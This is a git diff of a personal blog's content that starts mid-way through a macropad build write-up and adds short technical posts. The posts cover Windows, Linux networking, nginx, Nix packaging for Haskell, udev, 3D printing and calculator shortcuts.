The obvious solution was to get some sort of mechanical numpad, but my limited research into those made it abundantly clear that not only were these difficult to get ahold of in Canada, I probably could not get media buttons with them, somewhat defeating the purpose of getting one. Plus, I wanted an excuse to do some electronics.

I came up with the following design requirements:

- Must have a layer indication on the front
- Should have a numpad layout in case I want to use it as one
- Must have keys outside of the numpad to toggle between modes and provide other functionality
- Should have mechanical switches, because it is not worth doing anything less

This led me to use a block of 4x5 keys and a smaller block of 4x2 keys. I knew that addressable LEDs such as the WS2812B or the SK6812 were a good solution for layer indication on the front, requiring less layout work than installing a multiplexer and several single colour LEDs, and providing a good visual indication of layer state at a single glance. These could be used in the future for displaying some sort of system state of the connected computer.

I chose to use plate mount Cherry MX Black switches in this project. For context, many mechanical keyboards are designed such that the keyswitches clip into a plate, and the circuit board is subsequently inserted onto them from the back. An alternative is PCB mount switches, which rely on the circuit board for mechanical stability, producing less rigid action but avoiding the cost of a plate. I was building a case anyway, so plate mount was the obvious choice.

### Design phase

I began by designing the PCB in KiCad, based partially on [this guide](https://github.com/ruiqimao/keyboard-pcb-guide) on GitHub, and I found [this blog post on switch matrices](http://blog.komar.be/how-to-make-a-keyboard-the-matrix/) very helpful for understanding how the diode arrangement works with the keyswitches and how to draw it.
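To make the diode arrangement concrete, here is a small simulation (in Python rather than firmware C, for brevity) of why a switch matrix wants a diode per switch: pressing three keys that form an L shape creates a phantom fourth keypress unless diodes block the reverse current path. The matrix-scan logic is the standard technique; the specific 2x2 example is my own illustration, not taken from either guide:

```python
# Simulate scanning a 2x2 switch matrix. Without diodes, current can flow
# backwards through a pressed switch, so three pressed keys in an L shape
# make a fourth "ghost" key appear pressed.

def scan(pressed, has_diodes):
    """Return the set of (row, col) keys the controller believes are pressed."""
    seen = set()
    for drive_col in range(2):
        # Rows directly connected to the driven column via pressed switches:
        rows = {r for (r, c) in pressed if c == drive_col}
        if not has_diodes:
            # Without diodes, any other column sharing a pressed row is also
            # energized, which back-feeds more rows (one sneak-path hop shown).
            other_cols = {c for (r, c) in pressed if r in rows and c != drive_col}
            rows |= {r for (r, c) in pressed if c in other_cols}
        seen |= {(r, drive_col) for r in rows}
    return seen

l_shape = {(0, 0), (0, 1), (1, 0)}  # three real keypresses
print(scan(l_shape, has_diodes=True))   # only the three real keys
print(scan(l_shape, has_diodes=False))  # includes the ghost key (1, 1)
```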
There are a few comments to be made about that guide: it isn't updated for KiCad 5.x (the built-in KiCad libraries have been improved significantly since 4.x), and it uses a crystal symbol which can result in the wrong pinout with the recommended crystal.

Its suggestion of using custom libraries for crystals and other common components is questionable, based on a problem I encountered where my microcontroller was not communicating over the programming interface. I was not familiar with the available types of crystal and didn't know that there were different pinouts for some of them. The custom library only had the one, which happened not to match the suggested part's real pinout. If I had used the default library, I would probably have noticed that there were multiple types.

{% image(name="kicad-crystals.png") %}
Screenshot of the KiCad symbol picking dialog, with a part called "Crystal_GND23" selected, having ground on pins 2 and 3. Also listed is a "Crystal_GND24" with ground on pins 2 and 4.
{% end %}

While designing the schematic, I found [application note AVR042](http://ww1.microchip.com/downloads/en/appnotes/atmel-2521-avr-hardware-design-considerations_applicationnote_avr042.pdf) very helpful for explaining how to design the reset circuit, appropriate decoupling, and more.

### Manufacture

I chose JLCPCB for getting my PCBs manufactured because they were at most a third of the cost of the other options I looked at, and promised very impressive turnaround times for that price. In all, I spent C$17 on circuit boards, including shipping, and they took 8 days from order to landing on my doorstep. The PCBs turned out quite nice to my untrained eye:

{% image(name="macropad-front-small.jpg") %}
Photo of the front of a stack of rectangular green number pad shaped circuit boards with no parts populated yet.
{% end %}

{% image(name="macropad-back-small.jpg") %}
Like the previous photo, but the back of the boards.
{% end %}

All components on the board were hand soldered, with only slightly less flux than would be used by Louis Rossmann. This was my first project using SMD parts, and I can state unequivocally that 0805 sized parts are more than possible to solder by hand, and 0.8mm pitch TQFP packages are not too bad either. I purchased a T18-S7 well tip in order to drag solder more effectively, which was largely successful, though it might work even better with nicer flux.

Magnification was not required for soldering; however, it was critical for inspecting the soldering of the microcontroller, which revealed a few solder bridges. I used a jeweler's loupe.

Parts including switches and all electronics were purchased from Digi-Key, who, true to their reputation, had the parts on my doorstep the next day. The bill of materials cost is around C$52 at a quantity of 1.

The case and plate were printed in translucent PLA. It could probably have been printed in white and the LEDs would have shown through just fine. I designed the case in Fusion 360, which I am fairly familiar with, having designed projects such as my team's [Skills Canada robotics design](/blog/i-competed-in-skills-canada-robotics) in it.

### Firmware

This stage caused some problems in development, in particular getting the ISP programmer to work. These all turned out to be hardware and software issues unrelated to the actual ISP programmer. I dodged a bullet by using Linux regularly, because the symptoms of using avrdude on Windows are identical to the symptoms of the crystal not working or the cable being disconnected, which could have made for some horrific debugging.

The programmer in question is a Deek-Robot USBTinyISP obtained from Universal-Solder, an online shop based in Yorkton, SK carrying many cheap Chinese development boards for a very minimal premium over buying them on eBay. I'd strongly recommend them if you live in the Prairies, because using them saved me several weeks of wait time.

I chose qmk because it was posted somewhere online that it was better than tmk, and it does the job. Currently this part of the project is developed as a fork of the qmk repository, but I can likely push my keyboard configuration upstream.

There are many strong words that could be said about qmk documentation, but I cannot and will not say any of them until I've submitted pull requests to improve it.

I strongly recommend using the qmk bootloader, because it appears to be the only one which allows you to actually get out of DFU mode on keyboard startup, albeit by pressing a key (please tell me if I'm wrong on this!).

I found out only through a reddit post that there is a `:production` target in the qmk Makefile that builds a full image including the bootloader and the application image, which you can flash to the keyboard to bootstrap it. It is used, for example, by running `make handwired/mech_macropad:default:production`, where `handwired/mech_macropad` is the path under `keyboards/` for the keyboard you want to compile for and `default` is the keymap.

### Learnings

I learned the hard way to check footprints against datasheets, and to make sure that there are no unconnected pins in the schematic which are not intended to be that way. This happened when I had the wrong schematic symbol and footprint for my crystal. I'd like to thank the folks at CrashBang Labs for their invaluable help in debugging this issue.

I need to exercise more care in avoiding getting sticky flux into switches. Thankfully, that was learned on the reset switch rather than a keyswitch.

Many of the earlier tracks on the circuit board design were pointlessly thin, and the power tracks could be even thicker than they are. I will consider using polygons for both power and ground more aggressively in future designs, as they significantly simplify routing, reduce resistance, and improve EMI characteristics (which I look forward to learning about in Electrical Engineering over the next few years).

### Status

This project works with all designed features, though I need to invent more macros. Currently, I have music playback, volume controls, like/dislike in Google Play Music Desktop Player, and Discord mic mute.

A useful trick for these sorts of shortcuts that are not default OS functions is to use modifiers (ctrl, alt, shift) with high F keys: F13-F24 are supported on Windows and Mac, but few keyboards actually implement them, so they will not conflict with any existing shortcuts.

#### Source availability

This project is open source hardware, published under the terms of the TAPR Open Hardware License. The firmware is published under the GNU General Public License v2.

[Firmware](https://github.com/lf-/qmk_firmware)

[Hardware](https://github.com/lf-/reality/tree/master/mechanical-macropad)

Mechanical: I will publish this once I fix some clearance issues around the USB port to avoid requiring a Dremel.
20
content/posts/i-have-rss-now.md
Normal file
@@ -0,0 +1,20 @@
+++
date = "2020-11-21"
draft = false
path = "/blog/i-have-rss-now"
tags = ["site"]
title = "I have an RSS feed now"
+++

Hello!

The full content of this site is available by RSS at https://lfcode.ca/rss.xml. I can make no promises as to how fabulously RSS readers will render the full post contents without some kind of styling, but they are included.

If you have any further requests on how I can make this site work better for you, please email me at the address on the [About](/about) page or file an issue on the [source repo](https://github.com/lf-/blog).

Enjoy your syndication adventures~
24
content/posts/introducing-my-new-theme.md
Normal file
@@ -0,0 +1,24 @@
+++
author = "lf"
categories = ["meta", "ghost"]
date = 2016-03-06T04:40:37Z
description = ""
draft = false
path = "/blog/introducing-my-new-theme"
tags = ["meta", "ghost"]
title = "Introducing my new theme"

+++

Recently, I had enough of the Arabica theme for Ghost. Put simply, it was ancient, didn't look that great anyway, and was missing a bunch of newer Ghost features.

Its replacement is a fork of lanyon-ghost, itself a fork of lanyon (a theme for Jekyll).

Currently, all I've changed is the fonts, and I switched the homepage to display full posts, as it's quite irritating to have to click on each one to read it (while I'm at it, it would be *great* if Ghost allowed you to put a mark where the fold in the page is, so that longer posts don't eat up all the space on the page).

The fonts in use are the beautiful Charter (main content), Fira Sans (headings, other text), and Source Code Pro (monospace/code).

There's also an author page that shows the author's description, image, and such, along with their posts.

Here's the code: https://github.com/lf-/lanyon-ghost
18
content/posts/launching-powershell-using-the-win32-api.md
Normal file
@@ -0,0 +1,18 @@
+++
author = "lf"
categories = ["windows", "PowerShell", "win32"]
date = 2016-11-29T04:20:46Z
description = ""
draft = false
path = "/blog/launching-powershell-using-the-win32-api"
tags = ["windows", "PowerShell", "win32"]
title = "Launching PowerShell using the Win32 API"

+++

I was working on a personal project in C on Windows when I stumbled upon a really strange roadblock: a PowerShell instance would not actually run the script given to it when started via the Windows API, but it would when launched manually from `cmd.exe`.

Eventually the realisation came to me: PowerShell doesn't like the `DETACHED_PROCESS` option for `CreateProcess()`. I have no idea what it was doing with it there, but it didn't involve actually working.

I changed it to `CREATE_NO_WINDOW` and all is fine in the world.
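For reference, a minimal sketch of the working call looks something like the following. This is Windows-only illustrative code, not the original project's source; the script path is a placeholder and error handling is reduced to the bare minimum:

```c
// Windows-only sketch: launch PowerShell without a console window.
// CREATE_NO_WINDOW gives the child a hidden console; DETACHED_PROCESS
// gives it none at all, which PowerShell did not tolerate here.
#include <windows.h>

int main(void)
{
    STARTUPINFOW si = { .cb = sizeof(si) };
    PROCESS_INFORMATION pi;
    // CreateProcessW may modify the command line buffer, so it must be writable.
    // The script path below is a placeholder, not from the original post.
    wchar_t cmd[] = L"powershell.exe -File C:\\path\\to\\script.ps1";

    if (!CreateProcessW(NULL, cmd, NULL, NULL, FALSE,
                        CREATE_NO_WINDOW,  // not DETACHED_PROCESS
                        NULL, NULL, &si, &pi)) {
        return 1;
    }
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}
```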
34
content/posts/make-meshmixer-display-things-usably.md
Normal file
@@ -0,0 +1,34 @@
+++
author = "lf"
categories = ["3dprinting", "meshmixer"]
date = 2018-02-19T22:44:34Z
description = ""
draft = false
path = "/blog/make-meshmixer-display-things-usably"
tags = ["3dprinting", "meshmixer"]
title = "Meshmixer: Turn Off Smooth Display"

+++

The default display in Meshmixer is not ideal for working with technical models.

The setting responsible for this silliness is called "Mesh Normal Mode", which is unclear to most people who are not professional graphics programmers. Set it to "Face Normals" and Meshmixer will display models without making them look like amorphous blobs. Alternatively, hold spacebar and select the sphere that has visible vertices, as in the picture below.

### Setting in the "Hotbox"

{% image(name="meshmixer-setting-fix.png") %}
Screenshot of the "hotbox" that appears when you hold space in Meshmixer. There is a sphere with visible vertices highlighted, in the "Mesh" section under a subheading labeled "Normals".
{% end %}

### Default

{% image(name="meshmixer-default.png") %}
A render of a 3d model. There is strange visual artefacting around holes, and edges are not crisp.
{% end %}

### Face Normals

{% image(name="meshmixer-fixed.png") %}
A render of the same 3d model. All the edges are sharp.
{% end %}
@@ -0,0 +1,16 @@
+++
author = "lf"
date = 2019-08-25T04:49:46Z
description = ""
draft = true
path = "/blog/make-windows-10-mobile-hotspot-feature-stay-on-properly"
title = "Make Windows 10 \"Mobile Hotspot\" feature stay on properly"

+++

I am currently living somewhere where only wired access is available, and I would rather just use my computer as a router. One small problem: Windows seems to turn the hotspot off at random intervals, even if it is set not to turn off when not in use to "save power". The following registry key manipulation appears to fix it:

`Set-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\SharedAccess -Name EnableRebootPersistConnection -Value 1`

[https://support.microsoft.com/en-ca/help/4055559/ics-doesn-t-work-after-computer-or-service-restart-on-windows-10](https://support.microsoft.com/en-ca/help/4055559/ics-doesn-t-work-after-computer-or-service-restart-on-windows-10)
16
content/posts/making-the-makerfarm-pegasus-usable.md
Normal file
@@ -0,0 +1,16 @@
+++
author = "lf"
date = 2019-02-15T04:45:44Z
description = ""
draft = true
path = "/blog/making-the-makerfarm-pegasus-usable"
title = "Making the MakerFarm Pegasus usable"

+++

I made the mistake of purchasing a MakerFarm Pegasus around August 2017. It was alluring: a proper E3D extruder and hot end, more build volume, and no wait time, unlike the Prusa MK2S, for about the same price. Unfortunately, for that price you do not get as much printer, by a large margin.

The primary issue with the machine in my experience is bed leveling. On newer models of the Pegasus, the bed is no longer supported on springs, so the only method of leveling is manual mesh leveling, which has a very poor user experience on Marlin. I chose to use an optical bed probe, but it appears to vary in Z offset based mainly on the phase of the moon, so it needs to be babystepped at the start of every print, which is quite annoying.

I have developed a series of printed upgrades to make the machine either work better or work properly.
|
@@ -0,0 +1,22 @@
+++
author = "lf"
categories = ["hyper-v", "linux"]
date = 2016-12-18T04:46:03Z
description = ""
draft = false
path = "/blog/ms-documentation-sucks-or-how-i-got-my-vm-hostnames-to-be-set-automatically-from-kickstart"
tags = ["hyper-v", "linux"]
title = "MS Documentation sucks (or how I got my VM hostnames to be set automatically from kickstart)"
+++

I wanted to automate my Linux VM deployment on my Hyper-V based lab infrastructure. One small flaw: while DHCP does automatically update DNS, it does *not* do much when your VM is named "localhost". I wanted to make the Fedora deployment completely automated... which it is, after I wrote a kickstart, except you can't get into the new box because you can't find its IP address.

I wrote a small tool to deal with this issue:

https://github.com/lf-/kvputil

You want the variable `VirtualMachineName` in `/var/lib/hyperv/.kvp_pool_3`.
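For illustration, here is a minimal sketch of reading such a pool file. This assumes the Hyper-V KVP data exchange record layout (a NUL-padded 512-byte key followed by a NUL-padded 2048-byte value per record); it is not part of kvputil.

```python
# Sketch: parse a Hyper-V KVP guest pool file. Assumes the documented record
# layout: each record is a NUL-padded 512-byte key followed by a NUL-padded
# 2048-byte value.
KEY_SIZE = 512
VALUE_SIZE = 2048
RECORD_SIZE = KEY_SIZE + VALUE_SIZE


def parse_kvp_pool(data: bytes) -> dict:
    """Return the key/value records stored in a .kvp_pool_* file."""
    records = {}
    for off in range(0, len(data) - RECORD_SIZE + 1, RECORD_SIZE):
        chunk = data[off:off + RECORD_SIZE]
        # keys and values are NUL-padded; take everything before the first NUL
        key = chunk[:KEY_SIZE].split(b"\0", 1)[0].decode("utf-8", "replace")
        value = chunk[KEY_SIZE:].split(b"\0", 1)[0].decode("utf-8", "replace")
        if key:
            records[key] = value
    return records


# Usage on a guest with the KVP daemon running:
#   with open("/var/lib/hyperv/.kvp_pool_3", "rb") as f:
#       print(parse_kvp_pool(f.read()).get("VirtualMachineName"))
```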

Documentation that took way too long to find:

https://technet.microsoft.com/en-us/library/dn798287.aspx
26
content/posts/my-network-ups-tools-dont-work.md
Normal file
@@ -0,0 +1,26 @@
+++
author = "lf"
categories = ["homelab", "linux", "raspberry-pi", "udev"]
date = 2016-07-09T17:10:05Z
description = ""
draft = false
path = "/blog/my-network-ups-tools-dont-work"
tags = ["homelab", "linux", "raspberry-pi", "udev"]
title = "NUT not finding my UPS + fix"
+++

I use a CyberPower CP1500AVRLCD as a UPS in my lab. I'm just now getting enough equipment running on it that I want automatic shutdown (because it won't run for long with the higher power usage of more equipment). So, I plugged it into the Pi that was running as a cups-cloud-print server and sitting on a shelf with my network equipment. The problem was that the NUT driver for it didn't want to load. As is frighteningly common, it's a permissions problem.

Here's the log showing the issue:

    Jul 09 16:49:58 print_demon upsdrvctl[8816]: USB communication driver 0.33
    Jul 09 16:49:58 print_demon upsdrvctl[8816]: No matching HID UPS found
    Jul 09 16:49:58 print_demon upsdrvctl[8816]: Driver failed to start (exit status=1)

Here's the udev rule that fixes it (note that udev action names are lowercase: `"add"`, not `"ADD"`):

    ACTION=="add", SUBSYSTEM=="usb", ATTR{idProduct}=="0501", ATTR{idVendor}=="0764", MODE="0660", GROUP="nut"

When udev gets an event for the device with USB product ID 0501 and vendor ID 0764 being added to the system, this rule changes the permissions on its device files (think /dev/bus/usb/001/004 and /devices/platform/soc/20980000.usb/usb1/1-1/1-1.3) to allow group `nut` to read and write to it, enabling communication between the NUT driver and the device.
48
content/posts/nftables-redirect-not-working-fix.md
Normal file
@@ -0,0 +1,48 @@
+++
author = "lf"
categories = ["nftables", "linux"]
date = 2016-03-07T00:33:40Z
description = ""
draft = false
path = "/blog/nftables-redirect-not-working-fix"
tags = ["nftables", "linux"]
title = "nftables: redirect not working + fix"
+++

Recently, I made the somewhat rash decision to switch this VPS from ufw-managed iptables to nftables.

It's been a fun ride. The nftables man page doesn't document the redirect feature at all: it neither acknowledges its existence nor explains what it really does.

That's irrelevant, however, because it does the same thing as the `REDIRECT` target in iptables, which is documented in the `iptables-extensions` man page. From that, the behaviour of redirect in nftables can be inferred as "change the destination address to localhost, and change the destination port to the one specified after `to`".

I, however, was a bit too dense to go looking through there, and didn't read the wiki's section on redirection very carefully. I figured "hey, I just need to put redirect at the start of the chain hooked into nat prerouting to enable it, then add a rule specifically redirecting the port". Later, I wondered why it wasn't working. After some tcpdump, copious quantities of counters *everywhere*, and several netcat instances, I figured it out.

Note that you need to allow the packets with `dport 11113` in your filter. Your filter table will *never* see any packets on port 113 unless something has gone horribly wrong, as all of them will have had `dport` changed to 11113 in the `nat` table.

If you'd like to block inbound traffic on `11113` that was not sent there by the redirect, you can use a mark: in your rule in `prerouting`, add `ct mark set 1` before the `redirect to` clause. This sets a mark on the redirected connections. You can then accept only marked connections with a `ct mark == 1` condition in the `filter` table.
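A sketch of that marking setup (I have not tested this exact ruleset; the filter table and chain names are assumptions, so adapt them to your own config):

```
table ip nat {
    chain prerouting {
        type nat hook prerouting priority 0;
        tcp dport 113 ct mark set 1 counter redirect to 11113
    }
}

table ip filter {
    chain input {
        type filter hook input priority 0;
        # accept only connections that went through the redirect
        ct mark 1 tcp dport 11113 accept
        tcp dport 11113 drop
    }
}
```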

Here's the functional config:

    table ip nat {
        chain prerouting {
            type nat hook prerouting priority 0;
            tcp dport 113 counter redirect to 11113
        }

        chain postrouting {
            type nat hook postrouting priority 0;
        }
    }

    table ip6 nat {
        chain prerouting {
            type nat hook prerouting priority 0;
            tcp dport 113 counter redirect to 11113
        }

        chain postrouting {
            type nat hook postrouting priority 0;
        }
    }
27
content/posts/nginx-try_files-troubles.md
Normal file
@@ -0,0 +1,27 @@
+++
date = "2019-11-11"
draft = false
path = "/blog/nginx-try_files-troubles"
tags = ["nginx"]
title = "nginx: how to try multiple roots successively"
+++

As part of developing this new version of this site, I've needed to mess with nginx a lot while switching from Ghost to Gatsby, especially in relation to hosting files out of multiple directories.
<!-- excerpt -->

Specifically, this site is deployed by `rsync`ing the production version of the site onto the server behind `lfcode.ca`. I want to be able to use `--delete` to get rid of any old files, for reliability reasons (I don't want to accidentally rely on stuff that's not supposed to be there). Additionally, I am hosting static files at the root of `lfcode.ca` which I don't want to manage with Gatsby.

What this means is that I need the server to try, in order:

- serve the file from the Gatsby directory
- attempt to serve it as a directory and return index.html
- serve it from the untracked static files
- 404

There are countless StackOverflow posts on this exact problem, but for various reasons, the answers have issues of their own.

One popular suggestion is to set the `root` to some directory above both content directories, then use something like `try_files dir1$uri dir1$uri/ dir2$uri =404;`. This works... nearly.

It works properly for all direct paths, but the directory functionality is broken: nginx sends a 301 to the browser with `dir1/subdir/`, which, once followed, 404s, since the server will then try to serve `dir1/dir1/subdir/index.html`, which it can't find. Further, this redirection behaviour seems not to be documented anywhere.

The solution here is to just do `try_files dir1$uri dir1$uri/index.html dir2$uri =404;` and bypass the nginx index directive entirely.
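Concretely, a sketch of the resulting config (the directory names `gatsby` and `static` are placeholders for the two content roots):

```
server {
    # common parent of both content directories
    root /var/www;

    location / {
        try_files /gatsby$uri /gatsby$uri/index.html /static$uri =404;
    }
}
```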
226
content/posts/nix-and-haskell.md
Normal file
@@ -0,0 +1,226 @@
+++
date = "2020-07-16"
draft = false
path = "/blog/nix-and-haskell"
tags = ["nix", "haskell"]
title = "Using Nix to build multi-package, full stack Haskell apps"
+++

This post has been updated on June 16 following the finalization of the Nix port.

As part of my job working on an [open source logic textbook](https://carnap.io), I picked up a Haskell codebase that was rather hard to build. This was problematic for new contributors getting started, so I wanted to come up with a better process. Further, because of legal requirements for public institutions in BC, I need to be able to host this software in Canada, for which it is useful to have CI and containerization (where an easy-to-set-up build environment is directly valuable).

The value proposition of Nix is that it ensures the build environment is exactly the same regardless of who is building the software or where it is being built. It also makes it fairly easy for users to set up that environment. Finally, it has a package *and binaries* for GHCJS, which provides extraordinary time and effort savings by avoiding the process of setting up dependencies for and compiling GHCJS.

A lot of the documentation around Nix is styled like programming documentation rather than like packaging documentation, which makes it harder to figure out where to start with packaging. For example, it is not really clear what the "correct" way to structure a multiple-package Haskell project is: are you supposed to use overlays, overrides, or other methods? I chose overlays, based on the nixpkgs documentation's suggestion that they are the most advanced (and thus most modern?) way of putting stuff into nixpkgs.

The most significant tip I can give for doing Nix development, and especially for reading other Nix package source code, is that the best way to understand library calls is to read the nixpkgs source. This is for a couple of reasons: the user-facing documentation tends to be less complete than the documentation comments on functions, and it is often useful to read the library function source alongside the documentation.

Usually I keep a tab in my neovim open to the nixpkgs source and use either [nix-doc](https://github.com/lf-/nix-doc) or [ripgrep](https://github.com/BurntSushi/ripgrep) to search for the function I am interested in.

-----

This post summarizes the design decisions that went into implementing Nix for this existing full stack app. If you'd like to read the source, it is [available on GitHub](https://github.com/lf-/Carnap/tree/nix).

I have a top-level `default.nix` that imports nixpkgs with overlays for each conceptual part of the application (this could all be done in one overlay, but it is useful to separate them for maintenance purposes). A simplified version is below:

```nix
{ compiler ? "ghc865",
  ghcjs ? "ghcjs"
}:
let nixpkgs = import (builtins.fetchTarball {
      name = "nixpkgs-20.03-2020-06-28";
      url = "https://github.com/NixOS/nixpkgs/archive/f8248ab6d9e69ea9c07950d73d48807ec595e923.zip";
      sha256 = "009i9j6mbq6i481088jllblgdnci105b2q4mscprdawg3knlyahk";
    }) {
      config = {
        # Use this if you use 'broken' packages that are fixed in an overlay
        allowBroken = true;
      };
      overlays = [
        (import ./client.nix { inherit ghcjs; })
        (import ./server.nix { inherit ghcjs compiler; })
      ];
    };
in {
  client = nixpkgs.haskell.packages."${ghcjs}".Client;
  server = nixpkgs.haskell.packages."${compiler}".Server;
}
```

In each Haskell package, use `cabal2nix .` to generate nix files for the package. These nix files can then be picked up with [`lib.callPackage`](https://github.com/NixOS/nixpkgs/blob/b63f684/lib/customisation.nix#L96-L121) in an overlay:

```nix
{ ghcjs ? "ghcjs", compiler ? "ghc865" }:
self: super:
let overrideCabal = super.haskell.lib.overrideCabal;
in {
  haskell = super.haskell // {
    packages = super.haskell.packages // {
      "${compiler}" = super.haskell.packages."${compiler}".override {
        overrides = newpkgs: oldpkgs: {
          Common1 = oldpkgs.callPackage ./Common1/Common1.nix { };
          # ...
        };
      };
    };
  };
}
```

## Shells

You could normally use [`nixpkgs.haskell.packages.${ghcVer}.shellFor`](https://github.com/NixOS/nixpkgs/blob/c565d7c/pkgs/development/haskell-modules/make-package-set.nix#L288) to construct a shell. However, this is not ideal for multiple-package projects, since it will invariably make Nix build some of your own packages because they are "dependencies".

There does not appear to be any built-in resolution for this. However, [reflex-platform](https://github.com/reflex-frp/reflex-platform) has integrated a module called [`workOnMulti`](https://github.com/reflex-frp/reflex-platform/blob/20ed151/nix-utils/work-on-multi/default.nix). I thus took the opportunity to extricate it from its dependencies on the rest of reflex-platform, to be able to use it independently. This extracted version is [available here](https://github.com/lf-/Carnap/blob/cde2671/nix/work-on-multi.nix).

It can be used thus:

```nix
let # import nixpkgs with overlays...
    workOnMulti = import ./nix/work-on-multi.nix {
      inherit nixpkgs;
      # put whatever tools you want in the shell environments here
      generalDevTools = _: {
        inherit (nixpkgs) cabal2nix;
        inherit (nixpkgs.haskell.packages."${ghcVer}")
          Cabal
          cabal-install
          ghcid
          hasktags;
      };
    };
in {
  ghcShell = workOnMulti {
    envPackages = [
      "Common1"
      "Common2"
      "Server"
    ];
    env = with nixpkgs.haskell.packages."${ghcVer}"; {
      # enable hoogle in the environment
      ghc = ghc.override {
        override = self: super: {
          withPackages = super.ghc.withHoogle;
        };
      };
      inherit Common1 Common2 Server mkDerivation;
    };
  };
}
```

Then, you can use `nix-shell` with this attribute: `nix-shell -A ghcShell`.

Build with Cabal as usual (`cabal new-build all`), assuming you've built the GHCJS parts already (see below).

## GHCJS

GHCJS breaks many unit tests such that they freeze the Nix build process. You can override `mkDerivation` to disable most packages' unit tests. For some, this does not work because nixpkgs puts the test runs in a conditional already, which causes the `mkDerivation` override to be ignored. [`haskell.lib.dontCheck`](https://github.com/NixOS/nixpkgs/blob/32c8e79/pkgs/development/haskell-modules/lib.nix#L106-L109) can be used to deal with these cases.

```nix
# inside the config.packageOverrides.haskell.packages.${compiler}.override call
mkDerivation = args: super.mkDerivation (args // {
  doCheck = false;
  enableLibraryProfiling = false;
});
```

To integrate the GHCJS-built browser side code with the rest of the project, a [method inspired by reflex-platform](https://github.com/reflex-frp/reflex-platform/blob/6ce4607/docs/project-development.rst) is used. Namely, `nix-build -o client-out -A client` builds the client and puts a symbolic link to it in a known place, then manually created symbolic links are placed in the static folder pointing back into this client output link.

For package builds, a [`preConfigure` script](https://github.com/lf-/Carnap/blob/cde2671/server.nix#L30-L36) is used with [`haskell.lib.overrideCabal`](https://github.com/NixOS/nixpkgs/blob/32c8e79/pkgs/development/haskell-modules/lib.nix#L11-L41) to replace these links with paths in the Nix store for the browser JavaScript. A dependency on the built JavaScript is also added so it gets pulled in.

## Custom dependencies

Larger projects have a higher likelihood of depending on Hackage packages that are not in nixpkgs, or that absolutely need to be a specific version. It's easy to integrate these into the nix project using `cabal2nix`:

```
$ cabal2nix cabal://your-package-0.1.0.0 | tee nix/your-package.nix
```

These can then be integrated into the project by using [`lib.callPackage`](https://github.com/NixOS/nixpkgs/blob/b63f684/lib/customisation.nix#L96-L121).
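For example (the package name and file path here are placeholders), inside the same `overrides` set used in the overlay earlier:

```nix
overrides = newpkgs: oldpkgs: {
  # pick up the checked-in cabal2nix output for the pinned Hackage package
  your-package = oldpkgs.callPackage ./nix/your-package.nix { };
};
```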

While it is also possible to use [`callCabal2nix`](https://github.com/NixOS/nixpkgs/blob/f5b6ea1/pkgs/development/haskell-modules/make-package-set.nix#L200-L216), I chose not to, for reasons of initial build performance and reproducibility: `cabal2nix` is not fast, and inadvertent updates could happen when updates are made on the Hackage side, whereas checking in the `cabal2nix` output ensures that exactly the same package is used.

## Final thoughts

This project was very stimulating and challenging, and I learned a lot about both my own learning process for new, complex technologies and the technologies themselves. Throughout this process, for the first time, I treated learning a new technology like class material and read the documentation from top to bottom, taking notes on the useful parts. This made it easier to keep the unfamiliar language behaviour in mind while simultaneously reading code.

I will use *this* strategy again because, although it is slightly slower, it seemed to result in fewer trips to Google to check things and generally better comprehension.
42
content/posts/nspirations-on-getting-math-done-faster.md
Normal file
@@ -0,0 +1,42 @@
+++
author = "lf"
categories = ["nspire", "school", "software"]
date = 2019-04-16T23:50:00Z
description = ""
draft = false
path = "/blog/nspirations-on-getting-math-done-faster"
tags = ["nspire", "school", "software"]
title = "Nspirations on getting math done faster"
+++

I enjoy math so much that my primary goal is to get it done as quickly as possible. In more practical terms, the better I can get stuff done on my Nspire, the higher score I can potentially get on the AP exams \[later note: it was successful\]. <!-- excerpt -->

The Nspire is not *un*documented; it's just that the documentation is very well hidden. It's also not sorted by how often you might use something.

## Ctrl shortcuts
The fastest way to enter stuff is either by memorizing the menu numbers (you can press the number key shown next to a menu item to go straight to it), though that often puts you in a dialog box, or by typing it in. Unfortunately, typing stuff in is not always easy, and many characters seem to have no way to be typed other than by selecting them from the library or the character list.

The most significant ones are `\` (shift-divide) and `_` (ctrl-space). The backslash is useful for libraries, for example `ch\mm`, and the underscore is useful for annotating units, but I use it mostly for getting constants such as `_Rc` (the gas constant, 8.31 J/(mol·K)) and `_nA` (Avogadro's number).

Many of the usual shortcuts you might use on a computer are also available on the Nspire, for instance Ctrl-C, Ctrl-V, Ctrl-X, and Ctrl-A (with this last one, I like to enter square roots by typing the inside, pressing Ctrl-A, then the square root button). Selection can be done with shift-arrows or with the cursor as follows (note: this works on computers too, and is awesome for copying an entire page): click the mouse where you want to start a selection, then shift-click where you want it to end.

For Calculus, some of the most important shortcuts are Shift-plus and Shift-minus, which are the integral and the derivative. One way to remember them is to think of what each operation would do to the exponents in a polynomial: integrals increase the exponents, and derivatives decrease them.

If there's anything you should take away from this post, though, it's the cursor navigation shortcuts! They are in the same arrangement as on a computer numpad. That is to say, Ctrl-7 is Home, Ctrl-1 is End, Ctrl-9 is Page Up, and Ctrl-3 is Page Down.

## Graph environment
The most interesting thing about the graph environment is what I call the right click (Ctrl-Menu), which brings up the context menu for whatever is under the cursor. From this, you can access recent commands and other stuff:

{% image(name = "Annotation-2019-04-16-172723.png") %}
Screenshot of the TI-Nspire user interface showing a graph inside a document.

It shows a context menu with a numbered list of options including "Recent" for recent commands, "Attributes", "Hide", "Delete", and "Edit Relation" among others.
{% end %}

To do stuff precisely, for example when you are finding an integral between 0 and 2, select the integral command, then type 0 on the keyboard, press Enter, then type 2 and press Enter again.

To get the precise coordinates of some point, for example an intersection, click once on the text of the coordinate you want to store, press Ctrl-Var (sto->), and it will give something like `var := 123.45`. Enter the variable name you want, and press Enter. You can then access the information about that variable in the right click menu of the text.

If that point doesn't yet have coordinates displayed, for instance if you placed it from the geometry environment and need to move it to some precise position, you can give it some by clicking on the point, then selecting "Coordinates and Equations" from the right click menu.
129
content/posts/patching-jars-aa.md
Normal file
@@ -0,0 +1,129 @@
+++
date = "2020-11-11"
draft = false
path = "/blog/patching-jars-aa"
tags = ["reverse-engineering"]
title = "How to patch Java font rendering for AA"
+++

{{ image(name="jar-pre.png", alt="Screenshot of the software displaying disassembly of ARM instructions. The font is both very small and shows significant aliasing artifacts, making it hard to read") }}

